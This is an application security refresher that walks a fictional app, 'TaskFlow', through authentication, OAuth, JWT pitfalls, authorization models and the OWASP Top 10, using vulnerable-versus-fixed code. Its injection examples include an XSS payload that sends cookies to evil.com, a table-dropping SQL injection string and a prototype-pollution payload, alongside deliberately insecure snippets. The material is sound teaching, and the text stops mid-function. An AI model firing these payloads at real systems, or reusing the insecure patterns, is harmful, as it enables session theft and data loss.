Application Security Refresher
Scenario-driven security — OAuth, JWT, OWASP Top 10, threat modeling, and the patterns that keep production systems safe. Follow "TaskFlow" from first deploy to production hardening.
Table of Contents
1. Your App Just Went Live
You deployed TaskFlow — a SaaS task management app. Users can sign up, create projects, invite teammates, and manage tasks. The app works. You're proud. Then a colleague asks: "Is it secure?" You realize you don't have a great answer.
Security isn't one thing. It's the combination of many small decisions made correctly. The goal of this refresher is to make those decisions feel concrete rather than abstract — and to give you the vocabulary and patterns to reason about them clearly.
The Attacker's Mindset
An attacker looks at your app differently than you do. You built it to do something. They're looking for ways to make it do things it wasn't supposed to. The most useful mental shift: think about what your system trusts, and whether that trust is earned.
- Does your API trust the
user_idin a request body? An attacker will change it. - Does your app trust that file uploads are images? An attacker will upload PHP scripts.
- Does your login page trust that requests come from humans? An attacker will use a bot.
CIA Triad — Made Concrete
Security goals are often described as the CIA triad. Here's what each means for TaskFlow:
| Property | What it means | TaskFlow example |
|---|---|---|
| Confidentiality | Data is only readable by authorized parties | User A cannot read User B's tasks or API keys |
| Integrity | Data is only modifiable by authorized parties | User A cannot mark User B's tasks complete |
| Availability | The system is usable when legitimate users need it | An attacker cannot take the API down with a flood of requests |
Defense in Depth
Security depends on multiple overlapping layers rather than a single wall. If one layer fails, others compensate. For TaskFlow:
- Network layer: Cloudflare WAF, DDoS protection, TLS everywhere
- Application layer: Input validation, authentication, authorization checks
- Data layer: Encryption at rest, least-privilege DB users, no raw PII in logs
- Infrastructure layer: Secrets in vault, locked-down containers, dependency scanning
- Process layer: Security reviews, incident response plan, audit logging
Attack Surface Inventory
Before you can secure something, you need to know what exists. For TaskFlow, the attack surface includes:
- Public endpoints: login, signup, password reset, OAuth callbacks
- Authenticated endpoints: CRUD operations, file uploads, webhooks
- Admin endpoints: user management, billing, data export
- Third-party integrations: Google Calendar, Slack, payment processor
- Infrastructure: CI/CD pipelines, deployment scripts, secrets
Each surface is a potential entry point. The question isn't "can attackers find these?" — they will. The question is "have we secured each one correctly?"
2. Authentication — "Who Are You?"
A user hits TaskFlow's login page. Under the hood, your team is debating: should we use server-side sessions or JWTs? This isn't just a technical preference — it's an architectural decision with real trade-offs.
Session-Based Authentication
The server stores session state. The client carries only a session ID (in a cookie).
# Flask session-based auth
from flask import Flask, session, request, jsonify
import redis
import secrets
import hashlib
import os
import json
app = Flask(__name__)
app.secret_key = os.environ["SECRET_KEY"] # Never hardcode!
r = redis.Redis(host="localhost", port=6379)
@app.route("/login", methods=["POST"])
def login():
data = request.get_json()
user = db.users.find_by_email(data["email"])
if not user or not verify_password(data["password"], user.password_hash):
return jsonify({"error": "Invalid credentials"}), 401
# Important: invalidate any pre-login session to prevent session fixation
# r.delete(f"session:{old_session_id}") if old_session_id existed
# Generate cryptographically secure session ID
session_id = secrets.token_urlsafe(32)
# Store session in Redis with TTL
r.setex(
f"session:{session_id}",
3600, # 1 hour TTL
json.dumps({"user_id": user.id, "email": user.email})
)
resp = jsonify({"ok": True})
resp.set_cookie(
"sid",
session_id,
httponly=True, # Not accessible to JavaScript
secure=True, # HTTPS only
samesite="Lax", # CSRF protection
max_age=3600
)
return resp
@app.route("/tasks")
def get_tasks():
session_id = request.cookies.get("sid")
if not session_id:
return jsonify({"error": "Unauthenticated"}), 401
session_data = r.get(f"session:{session_id}")
if not session_data:
return jsonify({"error": "Session expired"}), 401
user = json.loads(session_data)
tasks = db.tasks.find_by_user(user["user_id"])
return jsonify(tasks)
Token-Based Authentication (JWTs)
The server issues a signed token. The client carries the full identity. No server-side state required.
// Go JWT middleware
package middleware
import (
"context"
"fmt"
"net/http"
"strings"
"github.com/golang-jwt/jwt/v5"
)
type contextKey string
const UserIDKey contextKey = "user_id"
func JWTAuth(secretKey []byte) func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
authHeader := r.Header.Get("Authorization")
if !strings.HasPrefix(authHeader, "Bearer ") {
http.Error(w, `{"error":"missing token"}`, http.StatusUnauthorized)
return
}
tokenStr := strings.TrimPrefix(authHeader, "Bearer ")
token, err := jwt.Parse(tokenStr, func(t *jwt.Token) (interface{}, error) {
// Enforce algorithm: reject tokens signed with unexpected alg
if _, ok := t.Method.(*jwt.SigningMethodHMAC); !ok {
return nil, fmt.Errorf("unexpected signing method: %v", t.Header["alg"])
}
return secretKey, nil
},
jwt.WithValidMethods([]string{"HS256"}),
jwt.WithAudience("taskflow-api"),
jwt.WithExpirationRequired(),
)
if err != nil || !token.Valid {
http.Error(w, `{"error":"invalid token"}`, http.StatusUnauthorized)
return
}
claims, ok := token.Claims.(jwt.MapClaims)
if !ok {
http.Error(w, `{"error":"invalid claims"}`, http.StatusUnauthorized)
return
}
userID, ok := claims["sub"].(string)
if !ok {
http.Error(w, `{"error":"missing sub claim"}`, http.StatusUnauthorized)
return
}
ctx := context.WithValue(r.Context(), UserIDKey, userID)
next.ServeHTTP(w, r.WithContext(ctx))
})
}
}
Sessions vs Tokens — When to Use Each
| Concern | Sessions | JWTs |
|---|---|---|
| State storage | Server-side (Redis) | Client-side (token) |
| Revocation | Instant (delete from Redis) | Hard (token valid until expiry) |
| Scalability | Shared store needed | Stateless, easy to scale |
| Payload size | Tiny cookie | Larger token (claims) |
| Best for | Traditional web apps | APIs, mobile, microservices |
3. JWT Deep Dive — "You're Using JWTs Wrong"
TaskFlow chose JWTs. The implementation works — until a security researcher reports that they can log in as any user. The bug: the team forgot to validate the algorithm. This is one of several JWT mistakes that are easy to make and catastrophic in production.
Structure: Three Base64URL-Encoded Parts
// A JWT looks like:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ1c2VyXzQyIiwic2NvcGUiOiJ0YXNrczpyZWFkIHRhc2tzOndyaXRlIiwiZXhwIjoxNzQyMDAwMDAwLCJpYXQiOjE3NDE5OTY0MDB9.abc123signature
// Decoded header:
{
"alg": "HS256", // Signing algorithm
"typ": "JWT"
}
// Decoded payload (READABLE BY ANYONE — not encrypted!):
{
"sub": "user_42", // Subject: who this token is for
"scope": "tasks:read tasks:write", // What they can do
"exp": 1742000000, // Expiry timestamp (Unix)
"iat": 1741996400, // Issued-at timestamp
"iss": "https://taskflow.app" // Issuer
}
// Signature: HMACSHA256(base64url(header) + "." + base64url(payload), secret)
// Verifying: recalculate signature, check it matches — proves payload was not tampered
- alg:none attack — An attacker sets
"alg": "none"and strips the signature. A naive library accepts it. Always verify the algorithm matches what you expect. - Symmetric secret brute-force — HS256 with a weak secret can be cracked offline. Use at least 256 bits of entropy, or switch to RS256.
- Sensitive data in payload — The payload is base64url encoded, not encrypted. Anyone who gets the token can read its contents. Never store passwords, SSNs, or PII in JWT claims.
- Token size bloat — Cramming all permissions into a JWT makes it huge. Every authenticated request sends this payload. Keep tokens lean; fetch permissions server-side for complex authz.
- Missing expiry — A JWT without
expis valid forever. Always set expiry.
Signing Algorithms Compared
| Algorithm | Type | Key requirement | Use when |
|---|---|---|---|
| HS256 | Symmetric (HMAC) | Shared secret | Single service; same party signs and verifies |
| RS256 | Asymmetric (RSA) | Private key signs, public key verifies | Auth server issues tokens; resource servers verify without the secret |
| ES256 | Asymmetric (ECDSA) | EC private/public key pair | Same as RS256 but smaller tokens; preferred for mobile |
Signing and Verifying — The Right Way
import jwt
import os
from datetime import datetime, timezone, timedelta
SECRET_KEY = os.environ["JWT_SECRET"] # Min 32 bytes, random
def create_access_token(user_id: str, scopes: list[str]) -> str:
now = datetime.now(timezone.utc)
payload = {
"sub": user_id,
"scope": " ".join(scopes),
"iss": "https://taskflow.app",
"iat": now,
"exp": now + timedelta(minutes=15), # Short-lived access token
}
return jwt.encode(payload, SECRET_KEY, algorithm="HS256")
def verify_access_token(token: str) -> dict:
try:
payload = jwt.decode(
token,
SECRET_KEY,
algorithms=["HS256"], # Explicit allowlist — rejects "none"
options={"require": ["exp", "sub", "iss"]},
issuer="https://taskflow.app",
)
return payload
except jwt.ExpiredSignatureError:
raise AuthError("Token expired")
except jwt.InvalidTokenError as e:
raise AuthError(f"Invalid token: {e}")
Refresh Token Rotation
Access tokens should be short-lived (15 minutes). Refresh tokens are longer-lived but must be rotated on every use to detect theft.
import hashlib
import secrets
from dataclasses import dataclass
@dataclass
class TokenPair:
access_token: str
refresh_token: str
def issue_token_pair(user_id: str) -> TokenPair:
access = create_access_token(user_id, ["tasks:read", "tasks:write"])
refresh = secrets.token_urlsafe(64) # High entropy, opaque string
# Store refresh token hash in DB (never store raw token)
token_hash = hashlib.sha256(refresh.encode()).hexdigest()
db.refresh_tokens.insert({
"user_id": user_id,
"token_hash": token_hash,
"expires_at": datetime.now(timezone.utc) + timedelta(days=30),
"family": secrets.token_urlsafe(16), # Token family for rotation detection
})
return TokenPair(access_token=access, refresh_token=refresh)
def rotate_refresh_token(old_refresh: str) -> TokenPair:
token_hash = hashlib.sha256(old_refresh.encode()).hexdigest()
record = db.refresh_tokens.find_by_hash(token_hash)
if not record:
raise AuthError("Invalid refresh token")
if record.used:
# Token reuse — indicates theft. Revoke entire family.
db.refresh_tokens.revoke_family(record.family)
raise AuthError("Refresh token reuse detected — all sessions revoked")
# Mark old token as used
db.refresh_tokens.mark_used(record.id)
# Issue new pair
return issue_token_pair(record.user_id)
4. OAuth 2.0 — "Let Users Log In With Google"
TaskFlow wants to add Google Calendar integration — users can attach due dates to Google Calendar events. Users ask: "Do I have to give you my Google password?" The answer should be no. That's what OAuth solves.
The Real Problem OAuth Solves
Before OAuth, the only way to let TaskFlow access your Google Calendar was to give TaskFlow your Google password. TaskFlow would store it, use it to log in on your behalf. This was terrible: TaskFlow could access everything in your account, you couldn't revoke access without changing your password, and if TaskFlow was breached, your Google account was compromised.
OAuth introduces a delegated authorization model: you grant TaskFlow limited access to specific Google resources, without sharing your password. You can revoke that access at any time without affecting your Google account.
Four Roles
- Resource Owner — You. The person who owns the Google Calendar data.
- Client — TaskFlow. The app that wants access to your data.
- Authorization Server — Google's OAuth server. Issues tokens after you consent.
- Resource Server — Google Calendar API. Accepts access tokens to serve your data.
Authorization Code Flow — Step by Step
import secrets
import hashlib
import base64
from urllib.parse import urlencode
import httpx
GOOGLE_CLIENT_ID = os.environ["GOOGLE_CLIENT_ID"]
GOOGLE_CLIENT_SECRET = os.environ["GOOGLE_CLIENT_SECRET"]
GOOGLE_AUTH_URL = "https://accounts.google.com/o/oauth2/v2/auth"
GOOGLE_TOKEN_URL = "https://oauth2.googleapis.com/token"
def start_oauth_flow(user_id: str) -> str:
"""Generate authorization URL with PKCE and state."""
# PKCE: code verifier is random, code challenge is its SHA256 hash
code_verifier = secrets.token_urlsafe(64)
code_challenge = base64.urlsafe_b64encode(
hashlib.sha256(code_verifier.encode()).digest()
).rstrip(b"=").decode()
# State: opaque value to prevent CSRF on callback
state = secrets.token_urlsafe(32)
# Store verifier and state — tied to this user's in-progress flow
redis.setex(f"oauth_state:{state}", 600, json.dumps({
"user_id": user_id,
"code_verifier": code_verifier,
}))
params = {
"client_id": GOOGLE_CLIENT_ID,
"redirect_uri": "https://taskflow.app/oauth/callback",
"response_type": "code",
"scope": "openid email https://www.googleapis.com/auth/calendar.readonly",
"state": state,
"code_challenge": code_challenge,
"code_challenge_method": "S256",
"access_type": "offline", # Request refresh token
"prompt": "consent",
}
return GOOGLE_AUTH_URL + "?" + urlencode(params)
def handle_oauth_callback(code: str, state: str) -> dict:
"""Exchange authorization code for tokens."""
# Validate state — prevents CSRF
stored = redis.get(f"oauth_state:{state}")
if not stored:
raise AuthError("Invalid or expired OAuth state")
redis.delete(f"oauth_state:{state}") # One-time use
flow_data = json.loads(stored)
# Exchange code for tokens (server-to-server — client secret stays on server)
response = httpx.post(GOOGLE_TOKEN_URL, data={
"code": code,
"client_id": GOOGLE_CLIENT_ID,
"client_secret": GOOGLE_CLIENT_SECRET,
"redirect_uri": "https://taskflow.app/oauth/callback",
"grant_type": "authorization_code",
"code_verifier": flow_data["code_verifier"], # PKCE verification
})
response.raise_for_status()
tokens = response.json()
# Store tokens encrypted in DB for this user
db.oauth_tokens.upsert({
"user_id": flow_data["user_id"],
"provider": "google",
"access_token": encrypt(tokens["access_token"]),
"refresh_token": encrypt(tokens.get("refresh_token")),
"expires_at": datetime.now(timezone.utc) + timedelta(seconds=tokens["expires_in"]),
})
return {"ok": True}
PKCE — Why SPAs and Mobile Apps Can't Use client_secret
A client_secret is only secret if it stays on a server. A React SPA or iOS app ships the secret to every user's device — anyone can extract it from the bundle. PKCE (Proof Key for Code Exchange) replaces the secret with a one-time cryptographic proof:
- Client generates a random
code_verifier(kept in memory) - Client sends
SHA256(code_verifier)ascode_challengein the auth request - On callback, client sends the original
code_verifier - Auth server verifies:
SHA256(code_verifier) == code_challenge
Even if an attacker intercepts the authorization code, they can't exchange it without the code_verifier that never left the client's memory.
Client Credentials — Machine-to-Machine
# TaskFlow's backend calling an internal analytics service
# No user involved — service authenticates directly
def get_machine_access_token() -> str:
response = httpx.post(TOKEN_URL, data={
"grant_type": "client_credentials",
"client_id": os.environ["ANALYTICS_CLIENT_ID"],
"client_secret": os.environ["ANALYTICS_CLIENT_SECRET"],
"scope": "analytics:read",
})
response.raise_for_status()
return response.json()["access_token"]
5. OpenID Connect — "One-Click Sign-In"
TaskFlow implements "Sign in with Google." OAuth handles authorization, but how does TaskFlow know who just logged in? That's what OpenID Connect adds on top of OAuth.
OAuth answers: "Is this user allowed to access this resource?" It doesn't answer: "Who is this user?" OpenID Connect (OIDC) extends OAuth with an identity layer: alongside the access token, the authorization server returns an ID token — a JWT containing the user's identity.
What OIDC Adds
- ID Token — A signed JWT with standard user identity claims
- UserInfo endpoint —
GET /userinforeturns user claims when called with an access token - Discovery document —
/.well-known/openid-configurationdescribes the provider's endpoints and capabilities - Standard scopes —
openid(required),profile,email,address,phone
Standard Claims in an ID Token
{
"iss": "https://accounts.google.com",
"sub": "1234567890", // Unique user identifier at this provider
"aud": "taskflow-client-id", // Must match your client_id
"exp": 1742000000,
"iat": 1741996400,
"email": "[email protected]",
"email_verified": true,
"name": "Alice Smith",
"picture": "https://lh3.googleusercontent.com/...",
"given_name": "Alice",
"family_name": "Smith",
"locale": "en"
}
import jwt
import httpx
def handle_google_signin(id_token: str, access_token: str) -> dict:
"""Verify ID token and extract user identity."""
# Production: cache JWKS with TTL (e.g., 1 hour) and refresh on unknown kid.
# The httpx calls below should use timeout=5.0 and retry logic.
# Fetch Google's public keys from discovery document
discovery = httpx.get(
"https://accounts.google.com/.well-known/openid-configuration",
timeout=5.0,
).json()
jwks_uri = discovery["jwks_uri"]
jwks = httpx.get(jwks_uri, timeout=5.0).json()
# Verify the ID token signature and claims
try:
payload = jwt.decode(
id_token,
jwt.algorithms.RSAAlgorithm.from_jwk(get_matching_key(jwks, id_token)),
algorithms=["RS256"],
audience=GOOGLE_CLIENT_ID,
issuer="https://accounts.google.com",
)
except jwt.InvalidTokenError as e:
raise AuthError(f"Invalid ID token: {e}")
# At this point we know: Google vouches this user authenticated
# sub is their stable Google identifier (use this as the foreign key, not email)
user = db.users.find_or_create_by_provider(
provider="google",
provider_user_id=payload["sub"],
defaults={
"email": payload.get("email"),
"name": payload.get("name"),
"avatar_url": payload.get("picture"),
}
)
return issue_token_pair(user.id)
def get_matching_key(jwks: dict, token: str):
"""Find the public key matching the token's kid header."""
header = jwt.get_unverified_header(token)
for key in jwks["keys"]:
if key["kid"] == header["kid"]:
return key
raise AuthError("No matching key found in JWKS")
sub claim is a stable, immutable identifier at the provider. Store provider + sub as your identity linkage. Use email only for display and communication.
6. Passwordless & Magic Links
TaskFlow's support team is drowning in "forgot my password" tickets. The team considers dropping passwords entirely. Magic links — clicking an emailed link to log in — are simpler for users and, implemented correctly, more secure than weak passwords.
Magic Link Flow
import secrets
import hashlib
from datetime import datetime, timezone, timedelta
def request_magic_link(email: str) -> None:
"""Generate and send a magic link. Always returns 200 to prevent email enumeration."""
user = db.users.find_by_email(email)
if not user:
# Don't reveal whether the email exists
# Optionally: auto-create account on first magic link click
return
# Generate token — high entropy opaque string
token = secrets.token_urlsafe(32)
token_hash = hashlib.sha256(token.encode()).hexdigest()
# Store the hash (never the raw token)
db.magic_link_tokens.insert({
"user_id": user.id,
"token_hash": token_hash,
"expires_at": datetime.now(timezone.utc) + timedelta(minutes=15),
"used": False,
"created_ip": request.remote_addr,
})
magic_url = f"https://taskflow.app/auth/magic?token={token}"
send_email(
to=email,
subject="Your TaskFlow login link",
body=f"Click to log in (expires in 15 minutes):\n\n{magic_url}\n\nIf you didn't request this, ignore this email.",
)
def verify_magic_link(token: str) -> TokenPair:
"""Validate token, issue session."""
token_hash = hashlib.sha256(token.encode()).hexdigest()
record = db.magic_link_tokens.find_by_hash(token_hash)
if not record:
raise AuthError("Invalid or expired magic link")
if record.used:
raise AuthError("This magic link has already been used")
if record.expires_at < datetime.now(timezone.utc):
raise AuthError("Magic link has expired")
# Mark as used — single use!
db.magic_link_tokens.update(record.id, {"used": True})
return issue_token_pair(record.user_id)
Security Properties of Magic Links
- Single-use: Each token is invalidated after first use. Replaying it fails.
- Short TTL: 15-minute window limits exposure if email is compromised.
- Email as second factor: Attacker needs access to the email inbox, not just a password.
- No password to steal: The most common credential breach vector is eliminated.
- Store hash, not token: DB breach doesn't expose valid tokens.
WebAuthn / Passkeys — The Future
Passkeys replace passwords with public-key cryptography. The private key never leaves the device. Authentication requires both the device (possession) and biometrics or PIN (knowledge/inherence). The browser handles the crypto via the WebAuthn API.
// WebAuthn registration (simplified)
async function registerPasskey(userId, username) {
const challenge = await fetchChallengeFromServer(); // Random bytes from server
const credential = await navigator.credentials.create({
publicKey: {
challenge: Uint8Array.from(atob(challenge), c => c.charCodeAt(0)),
rp: { name: "TaskFlow", id: "taskflow.app" },
user: {
id: Uint8Array.from(userId, c => c.charCodeAt(0)),
name: username,
displayName: username,
},
pubKeyCredParams: [
{ alg: -7, type: "public-key" }, // ES256
{ alg: -257, type: "public-key" }, // RS256
],
authenticatorSelection: {
residentKey: "required", // Passkey (stored on device)
userVerification: "required",
},
},
});
// Send credential.response to server to store public key
await saveCredentialToServer(credential);
}
// WebAuthn authentication
async function authenticateWithPasskey() {
const challenge = await fetchChallengeFromServer();
const assertion = await navigator.credentials.get({
publicKey: {
challenge: Uint8Array.from(atob(challenge), c => c.charCodeAt(0)),
rpId: "taskflow.app",
userVerification: "required",
},
});
// Server verifies the assertion signature using stored public key
return await verifyAssertionOnServer(assertion);
}
7. Authorization Patterns — Who Can Do What?
Authentication is solved. Now: Alice is an admin of the "Engineering" workspace but a regular member of "Marketing." Bob is a guest in "Engineering" — he can view tasks but not delete them. The intern can only see their own tasks. This is authorization: what authenticated users are allowed to do.
RBAC — Role-Based Access Control
Users are assigned roles. Roles have permissions. This works well when permission sets are stable and role count is small.
from enum import Enum
from functools import wraps
class Role(str, Enum):
OWNER = "owner"
ADMIN = "admin"
MEMBER = "member"
GUEST = "guest"
# Permission matrix
PERMISSIONS = {
Role.OWNER: {"tasks:create", "tasks:read", "tasks:update", "tasks:delete", "workspace:manage", "members:manage"},
Role.ADMIN: {"tasks:create", "tasks:read", "tasks:update", "tasks:delete", "members:manage"},
Role.MEMBER: {"tasks:create", "tasks:read", "tasks:update"},
Role.GUEST: {"tasks:read"},
}
def require_permission(permission: str):
"""Decorator that checks if the current user has the required permission."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
user_id = get_current_user_id()
workspace_id = kwargs.get("workspace_id") or request.view_args.get("workspace_id")
membership = db.memberships.find(user_id=user_id, workspace_id=workspace_id)
if not membership:
return jsonify({"error": "Not a member"}), 403
allowed = PERMISSIONS.get(membership.role, set())
if permission not in allowed:
return jsonify({"error": "Insufficient permissions"}), 403
return f(*args, **kwargs)
return wrapper
return decorator
@app.route("/workspaces/<workspace_id>/tasks/<task_id>", methods=["DELETE"])
@require_permission("tasks:delete")
def delete_task(workspace_id, task_id):
task = db.tasks.find(id=task_id, workspace_id=workspace_id)
if not task:
return jsonify({"error": "Not found"}), 404
db.tasks.delete(task_id)
return jsonify({"ok": True})
ABAC — Attribute-Based Access Control
When RBAC gets too complex (conditional permissions, time-based access, contextual rules), ABAC evaluates policies against attributes of the subject, resource, and environment.
# ABAC: can the user edit this task?
def can_edit_task(user: User, task: Task, context: dict) -> bool:
"""
Rules:
- Owners/admins can always edit
- Members can edit if they're the assignee or creator
- Guests can never edit
- No one can edit completed tasks after 24 hours
- No editing during scheduled maintenance window
"""
if user.workspace_role in (Role.OWNER, Role.ADMIN):
return True
if user.workspace_role == Role.GUEST:
return False
if task.status == "completed":
age = datetime.now(timezone.utc) - task.completed_at
if age > timedelta(hours=24):
return False
if context.get("maintenance_mode"):
return False
# Member: can edit their own tasks
return task.creator_id == user.id or task.assignee_id == user.id
ReBAC — Relationship-Based Access Control
Google Zanzibar (and its open-source implementations like SpiceDB and OpenFGA) express access control as a graph of relationships. This scales to complex hierarchies.
# SpiceDB schema: TaskFlow authorization model
definition workspace {
relation owner: user
relation admin: user
relation member: user
relation guest: user
permission manage = owner + admin
permission write = owner + admin + member
permission read = owner + admin + member + guest
}
definition task {
relation workspace: workspace
relation creator: user
relation assignee: user
permission delete = workspace->manage + creator
permission edit = workspace->write + assignee
permission view = workspace->read
}
DELETE /tasks/123 directly — they don't need the button. Authorization must be enforced server-side on every request, every time. The frontend is just the view layer.
The Confused Deputy Problem
A "confused deputy" is when a privileged service is tricked into taking actions on behalf of an unauthorized user. Classic example:
# VULNERABLE: endpoint trusts caller-supplied task_id
@app.route("/tasks/<task_id>/complete", methods=["POST"])
@require_auth
def complete_task(task_id):
# Fetches task_id from URL — but does NOT verify this user owns the task!
db.tasks.update(task_id, {"status": "completed"}) # Any task, any user!
return jsonify({"ok": True})
# FIXED: always scope queries to the authenticated user's workspace from the URL path
@app.route("/workspaces/<workspace_id>/tasks/<task_id>/complete", methods=["POST"])
@require_auth
def complete_task(workspace_id, task_id):
workspace_id = request.view_args.get("workspace_id")
task = db.tasks.find(id=task_id, workspace_id=workspace_id)
if not task:
return jsonify({"error": "Task not found"}), 404 # Same error for not-found and unauthorized
db.tasks.update(task_id, {"status": "completed"})
return jsonify({"ok": True})
8. OWASP Top 10 in Context
The OWASP Top 10 is a consensus list of the most critical web application security risks, updated every few years based on real breach data. Here's each one as it would manifest in TaskFlow — with vulnerable code and the fix.
A01 — Broken Access Control
The #1 risk. Users can act outside their intended permissions. The classic variant: changing an ID in a URL to access someone else's data (IDOR — Insecure Direct Object Reference).
# VULNERABLE: attacker changes task_id=456 to task_id=789
@app.route("/tasks/<int:task_id>")
@require_auth
def get_task(task_id):
task = db.query("SELECT * FROM tasks WHERE id = %s", task_id)
return jsonify(task) # Returns any task, regardless of who owns it!
# FIXED: always filter by the authenticated user's context
@app.route("/tasks/<int:task_id>")
@require_auth
def get_task(task_id):
user_id = get_current_user_id()
# Only returns tasks in workspaces where user is a member
task = db.query("""
SELECT t.* FROM tasks t
JOIN workspace_members wm ON wm.workspace_id = t.workspace_id
WHERE t.id = %s AND wm.user_id = %s
""", task_id, user_id)
if not task:
return jsonify({"error": "Not found"}), 404 # Same error for both cases
return jsonify(task)
A02 — Cryptographic Failures
Data exposed in transit or at rest. Passwords stored with weak or no hashing. Sensitive data returned unnecessarily in API responses.
# VULNERABLE: MD5 for passwords (cracked in seconds with rainbow tables)
import hashlib
def store_password_bad(password):
return hashlib.md5(password.encode()).hexdigest() # NEVER do this
# ALSO VULNERABLE: returning sensitive fields in API responses
def user_to_dict_bad(user):
return {
"id": user.id,
"email": user.email,
"password_hash": user.password_hash, # Never expose this!
"api_key": user.api_key, # Never expose this!
}
# FIXED: bcrypt with appropriate work factor
import bcrypt
def store_password(password: str) -> str:
salt = bcrypt.gensalt(rounds=12) # Work factor: tune so hashing takes ~100ms
return bcrypt.hashpw(password.encode(), salt).decode()
def verify_password(password: str, stored_hash: str) -> bool:
return bcrypt.checkpw(password.encode(), stored_hash.encode())
# FIXED: explicit response schema — only include what's needed
def user_to_public_dict(user):
return {
"id": user.id,
"email": user.email,
"name": user.name,
"avatar_url": user.avatar_url,
# No password_hash, no api_key, no internal fields
}
A03 — Injection
SQL injection and XSS are the classic injection flaws. Both stem from the same root cause: mixing untrusted data with code or markup without proper escaping.
# VULNERABLE: SQL injection
def search_tasks_bad(query: str):
# If query = "'; DROP TABLE tasks; --"
sql = f"SELECT * FROM tasks WHERE title LIKE '%{query}%'"
return db.execute(sql) # Catastrophic!
# FIXED: parameterized queries
def search_tasks(query: str):
return db.execute(
"SELECT * FROM tasks WHERE title ILIKE %s",
(f"%{query}%",) # Parameter, never interpolated into SQL string
)
// VULNERABLE: XSS via innerHTML
function renderTaskBad(task) {
// If task.title is: <script>document.location='https://evil.com?c='+document.cookie</script>
document.getElementById('container').innerHTML = `<div>${task.title}</div>`;
}
// FIXED: textContent treats content as text, never HTML
function renderTask(task) {
const container = document.getElementById('container');
const div = document.createElement('div');
div.className = 'task';
div.textContent = task.title; // Safe
container.appendChild(div);
}
// When you need to allow some HTML (e.g., rich text), sanitize first:
import DOMPurify from 'dompurify';
function renderDescription(html) {
return DOMPurify.sanitize(html, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'li'],
ALLOWED_ATTR: ['href'],
});
}
A04 — Insecure Design
Security flaws baked into the design that middleware can't patch. Example: no rate limiting on password reset lets an attacker spam any inbox.
# INSECURE DESIGN: new password in URL (visible in logs, referrer headers, history)
def reset_password_bad(email: str):
new_password = secrets.token_urlsafe(12)
db.users.update_password(email, hash_password(new_password))
send_email(email, f"Your new password: https://taskflow.app/login?pass={new_password}")
# INSECURE DESIGN: no rate limiting on password reset
@app.route("/forgot-password", methods=["POST"])
def forgot_password_bad():
send_reset_email(request.json["email"]) # No rate limiting!
# SECURE DESIGN: time-limited token, rate-limited, invalidated after use
from flask_limiter import Limiter
limiter = Limiter(key_func=lambda: request.remote_addr)
@app.route("/forgot-password", methods=["POST"])
@limiter.limit("3 per hour")
def forgot_password():
email = request.json.get("email", "")
user = db.users.find_by_email(email)
if user:
token = secrets.token_urlsafe(32)
redis.setex(f"reset:{token}", 900, user.id) # 15 min TTL
send_email(email, f"Reset link (expires in 15 min): https://taskflow.app/reset?token={token}")
return jsonify({"message": "If that email exists, you'll receive a reset link."})
A05 — Security Misconfiguration
Debug mode in production, default credentials, verbose error messages leaking internals, unnecessary services exposed.
# VULNERABLE: debug mode in production exposes interactive debugger (instant RCE)
app.run(debug=True)
# VULNERABLE: stack traces in API responses
@app.errorhandler(Exception)
def handle_error(e):
return jsonify({"error": str(e), "traceback": traceback.format_exc()}), 500
# FIXED: environment-specific config, generic errors for users
DEBUG = os.environ.get("FLASK_DEBUG", "0") == "1"
app.run(debug=DEBUG)
@app.errorhandler(Exception)
def handle_error(e):
app.logger.error(f"Unhandled exception: {e}", exc_info=True) # Log detail internally
if DEBUG:
return jsonify({"error": str(e)}), 500
return jsonify({"error": "Internal server error"}), 500 # Generic for users
A06 — Vulnerable and Outdated Components
Using libraries with known CVEs. The Log4Shell vulnerability (2021) affected ~3 billion Java applications. Lodash prototype pollution (2019) hit millions of JavaScript projects.
// VULNERABLE: lodash 4.17.4 with prototype pollution (CVE-2019-10744)
const _ = require('lodash');
const userData = JSON.parse(userInput);
// Attacker sends: {"__proto__": {"isAdmin": true}}
_.merge({}, userData);
console.log({}.isAdmin); // true — entire process polluted!
// FIXED: update to lodash 4.17.21+, validate input, use Object.create(null) for untrusted merges
# Dependency scanning in CI/CD
npm audit --audit-level=high || exit 1
pip-audit || exit 1
trivy fs . --scanners vuln --exit-code 1 --severity HIGH,CRITICAL
A07 — Identification and Authentication Failures
No brute-force protection, weak passwords accepted, credentials stuffed from breach databases, session IDs not rotated post-login.
// Brute-force protection: exponential backoff per account
// WARNING: In-memory counters don't work in multi-instance deployments.
// For production, use Redis-backed rate limiting (see Section 9).
type LoginAttempts struct {
mu sync.Mutex
counts map[string]int
lastFail map[string]time.Time
}
func (la *LoginAttempts) Delay(email string) time.Duration {
la.mu.Lock()
defer la.mu.Unlock()
n := la.counts[email]
if n == 0 {
return 0
}
// 0, 1s, 2s, 4s, 8s... capped at 30s
delay := time.Duration(min(1<<uint(n-1), 30)) * time.Second
return delay
}
func (la *LoginAttempts) Record(email string, success bool) {
la.mu.Lock()
defer la.mu.Unlock()
if success {
delete(la.counts, email)
} else {
la.counts[email]++
la.lastFail[email] = time.Now()
}
}
A08 — Software and Data Integrity Failures
Unverified CI/CD actions, unsigned artifacts, deserialization of untrusted data.
# VULNERABLE: unpinned actions can be hijacked via tag mutation
- uses: actions/checkout@main
- uses: actions/setup-python@v4
# FIXED: pin to immutable commit SHA
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0
# Scan container images for vulnerabilities before pushing
- name: Scan image
run: trivy image --exit-code 1 --severity CRITICAL ghcr.io/taskflow/api:$GITHUB_SHA
A09 — Security Logging and Monitoring Failures
Attacks succeed but go undetected. When a breach is discovered, there's no audit trail to determine blast radius.
import structlog
audit_log = structlog.get_logger("audit")
# Log security-relevant events with structured fields
def log_security_event(event: str, **kwargs):
audit_log.info(
event,
ip=request.remote_addr,
user_agent=request.headers.get("User-Agent"),
timestamp=datetime.now(timezone.utc).isoformat(),
**kwargs
)
# Events that must be logged
AUDIT_EVENTS = [
"auth.login.success", "auth.login.failure", "auth.logout",
"auth.password_change", "auth.mfa_change",
"access.denied",
"admin.user_disabled", "admin.role_changed",
"data.export", "data.bulk_delete",
]
# Example: login attempt logging
@app.route("/login", methods=["POST"])
def login():
email = request.json.get("email")
user = db.users.find_by_email(email)
